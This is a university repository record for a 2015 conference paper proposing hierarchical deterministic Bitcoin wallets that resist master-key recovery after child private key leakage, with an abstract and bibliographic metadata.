Hierarchical deterministic Bitcoin wallets that tolerate key leakage (short paper)

Gutoski, Gus & Stebila, Douglas (2015) Hierarchical deterministic Bitcoin wallets that tolerate key leakage (short paper). In Böhme, Rainer & Okamoto, Tatsuaki (Eds.) Financial Cryptography and Data Security: 19th International Conference, FC 2015, Revised Selected Papers [Lecture Notes in Computer Science, Volume 8975], Springer, San Juan, Puerto Rico, United States of America, pp. 497-504.

[img] Accepted Version (PDF 220kB)
Administrators only | Request a copy from author

View at publisher


A Bitcoin wallet is a set of private keys known to a user and which allow that user to spend any Bitcoin associated with those keys. In a hierarchical deterministic (HD) wallet, child private keys are generated pseudorandomly from a master private key, and the corresponding child public keys can be generated by anyone with knowledge of the master public key. These wallets have several interesting applications including Internet retail, trustless audit, and a treasurer allocating funds among departments. A specification of HD wallets has even been accepted as Bitcoin standard BIP32.

Unfortunately, in all existing HD wallets---including BIP32 wallets---an attacker can easily recover the master private key given the master public key and any child private key. This vulnerability precludes use cases such as a combined treasurer-auditor, and some in the Bitcoin community have suspected that this vulnerability cannot be avoided.

We propose a new HD wallet that is not subject to this vulnerability. Our HD wallet can tolerate the leakage of up to m private keys with a master public key size of O(m). We prove that breaking our HD wallet is at least as hard as the so-called "one more" discrete logarithm problem.

Impact and interest:

0 citations in Scopus
Search Google Scholar™

Citation counts are sourced monthly from Scopus and Web of Science® citation databases.

These databases contain citations from different subsets of available publications and different time periods and thus the citation count from each is usually different. Some works are not in either database and no count is displayed. Scopus includes citations from articles published in 1996 onwards, and Web of Science® generally from 1980 onwards.

Citations counts from the Google Scholar™ indexing service can be viewed at the linked Google Scholar™ search.

ID Code: 82221
Item Type: Conference Paper
Refereed: Yes
Keywords: Bitcoin
DOI: 10.1007/978-3-662-47854-7_31
ISBN: 978-3-662-47853-0
Subjects: Australian and New Zealand Standard Research Classification > INFORMATION AND COMPUTING SCIENCES (080000) > DATA FORMAT (080400) > Data Encryption (080402)
Divisions: Current > Schools > School of Electrical Engineering & Computer Science
Current > Institutes > Institute for Future Environments
Current > QUT Faculties and Divisions > Science & Engineering Faculty
Copyright Owner: Copyright 2015 International Financial Cryptography Association
Deposited On: 05 Mar 2015 23:23
Last Modified: 01 Dec 2015 08:49

Export: EndNote | Dublin Core | BibTeX

Repository Staff Only: item control page